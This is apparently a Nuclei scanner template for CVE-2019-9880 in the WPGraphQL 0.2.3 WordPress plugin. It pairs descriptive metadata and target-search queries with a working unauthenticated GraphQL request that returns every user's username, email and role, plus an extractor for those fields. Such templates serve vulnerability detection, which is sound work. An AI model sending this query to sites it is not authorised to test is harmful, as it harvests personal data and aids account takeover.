id: CVE-2019-9880

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
  author: intelligent-ears
  severity: critical
  description: |
    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
  impact: |
    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-9880
    cwe-id: CWE-306
    epss-score: 0.72894
    epss-percentile: 0.98804
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "query { users { nodes { id name email username roles } } }"}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

    extractors:
      - type: json
        name: user-data
        json:
          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'
# digest: 4b0a004830460221009ea5bb341fcae610636226c8b7b94db5494926edb1fc7986e3bc62a28d454b940221009f8cd92b54794b25c8a2131a912d41f515428589cc8bf414cfc8da608b22df14:922c64590222798bb761d5b6d8e72950